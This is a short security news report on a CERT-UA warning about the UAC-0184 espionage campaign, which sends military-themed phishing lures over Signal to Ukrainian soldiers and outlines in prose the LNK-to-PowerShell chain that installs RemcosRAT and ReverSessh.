The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new cyberespionage campaign targeting members of the Ukrainian Armed Forces, orchestrated by a threat actor tracked as UAC-0184. The campaign uses phishing lures linked to themes of war and military operations to deploy the RemcosRAT and ReverSessh malware.
CERT-UA says it initiated an investigation following a report from Trend Micro about suspicious files disguised as recruitment efforts for the 3rd Separate Storm Brigade and the Israeli Defense Forces (IDF).
The investigation revealed that the threat actor has been using the Signal messaging app to distribute archives containing LNK files, the execution of which triggered a chain of malware infections, including the RemcosRAT and ReverSessh tools that provided unauthorized remote access to computer systems for malicious actors.
Typically, these deceptive shortcut files contain obfuscated commands for loading and launching an HTA file using mshta.exe, which contains obfuscated code. Subsequently, VBScript code executes PowerShell commands responsible for decryption (AES-128-ECB), decompression (GZIP), and launching a PowerShell script.
The final step ensures the download and execution of malicious files, along with a bait document (PDF or DOCX). Notably, the names and content of these documents are highly relevant to military personnel, featuring titles such as “Prisoner Interrogation,” “Geolocation Data,” “Encryption Commands,” and “Call Signs.”
